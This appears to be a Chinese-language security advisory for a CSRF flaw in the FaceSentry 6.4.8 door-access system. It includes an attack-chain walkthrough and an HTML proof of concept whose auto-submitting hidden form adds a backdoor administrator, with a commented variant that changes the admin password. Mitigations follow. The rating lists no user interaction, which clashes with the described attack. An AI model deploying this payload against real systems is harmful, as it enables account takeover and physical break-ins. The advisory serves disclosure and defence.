CVE-2019-25242 FaceSentry Access Control System 跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2019-25242

漏洞类型

跨站请求伪造（CSRF）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FaceSentry Access Control System 6.4.8

漏洞概述

FaceSentry Access Control System 6.4.8版本存在跨站请求伪造（CSRF）安全漏洞。该系统是一款广泛应用于企业和机构场所的门禁管理系统，用于控制人员的进出权限。攻击者利用此漏洞可以构造恶意网页，当已认证的管理员访问该页面时，浏览器会自动向目标系统发送伪造的管理员请求，从而在用户不知情的情况下执行各种管理操作。攻击者可以利用此漏洞更改管理员密码，使原管理员失去系统访问控制权；或添加新的管理员账户，为后续入侵建立持久化后门；甚至直接远程打开门禁，绕过物理安全控制实现非法进入受保护区域。由于CSRF攻击利用的是用户已建立的认证会话，且攻击行为由用户浏览器发起，因此传统的防火墙和入侵检测系统难以识别和阻止此类攻击。

技术细节

跨站请求伪造（CSRF）是一种利用用户已认证身份的攻击方式。在FaceSentry Access Control System 6.4.8中，管理功能缺乏有效的CSRF防护机制。系统未对关键管理操作实施CSRF令牌验证，也未验证HTTP请求的来源合法性。攻击者可以构造包含恶意表单的HTML页面，当已登录的管理员访问该页面时，浏览器会自动携带有效的会话Cookie向目标系统发送POST请求。由于系统仅验证用户是否已认证，而未验证请求来源的合法性，因此会执行攻击者预设的管理操作。攻击者通常会构造自动提交的表单，利用JavaScript在页面加载时自动触发请求，并通过CSS样式隐藏表单内容，使管理员完全不知情。常见的攻击场景包括：修改管理员密码、添加新管理员账户、删除现有用户、配置门禁权限参数，以及远程开门操作。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎、Shodan等工具发现暴露在互联网上的FaceSentry Access Control System，并确定版本号为6.4.8

STEP 2

步骤2：构造恶意页面

攻击者分析系统的管理接口，构造包含恶意表单的HTML页面，表单内容为系统预期的管理操作请求，如添加用户或修改密码

STEP 3

步骤3：社会工程攻击

攻击者通过钓鱼邮件、即时通讯或恶意网站诱导已认证的管理员访问构造的恶意页面

STEP 4

步骤4：自动触发攻击

管理员访问恶意页面后，页面中的JavaScript代码自动提交表单，浏览器携带有效的会话Cookie向目标系统发送POST请求

STEP 5

步骤5：权限滥用

系统验证用户已认证后执行攻击者预设的操作，成功添加后门账户或修改管理员密码

STEP 6

步骤6：持久化控制

攻击者使用新创建的账户登录系统，获得完整的管理权限，可进一步窃取数据或开放物理门禁

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2019-25242: FaceSentry Access Control System -->
<!-- This PoC demonstrates adding a new admin user -->
<html>
  <body>
    <h2>CVE-2019-25242 CSRF Attack PoC</h2>
    <p>Target: FaceSentry Access Control System 6.4.8</p>
    <p>Action: Add new administrator account</p>
    
    <form id="csrfForm" action="http://target-ip:8080/facesentry/admin/userManagement" method="POST">
      <input type="hidden" name="action" value="addUser" />
      <input type="hidden" name="username" value="backdoor_admin" />
      <input type="hidden" name="password" value="P@ssw0rd123" />
      <input type="hidden" name="role" value="administrator" />
      <input type="hidden" name="department" value="IT" />
      <input type="hidden" name="cardNumber" value="12345678" />
    </form>
    
    <script>
      // Auto-submit the form when page loads
      document.getElementById('csrfForm').submit();
    </script>
    
    <p>If you can see this message, the attack may have failed.</p>
  </body>
</html>

<!-- Alternative PoC: Change admin password -->
<!--
<html>
  <body>
    <form action="http://target-ip:8080/facesentry/admin/passwordChange" method="POST">
      <input type="hidden" name="currentPassword" value="original" />
      <input type="hidden" name="newPassword" value="hacked123" />
      <input type="hidden" name="confirmPassword" value="hacked123" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>
-->

影响范围

FaceSentry Access Control System 6.4.8

防御指南

临时缓解措施

在等待官方补丁发布期间，可采取以下临时缓解措施：1）暂时关闭管理界面的公网访问，仅允许通过VPN或内网访问；2）监控WAF日志中的异常管理接口请求，识别可能的CSRF攻击行为；3）提醒管理员不要点击可疑链接，并在使用完管理界面后及时登出；4）考虑部署专门的CSRF防护中间件，对所有POST请求进行来源验证；5）定期检查系统用户列表，及时发现异常添加的管理员账户。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2019-25242
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2019-25242
3 Details https://www.cvedetails.com/cve/CVE-2019-25242/
4 VulDB https://vuldb.com/cve/CVE-2019-25242
5 Link http://www.iwt.com.hk
6 Link https://www.exploit-db.com/exploits/47065
7 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5524.php
8 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5524.php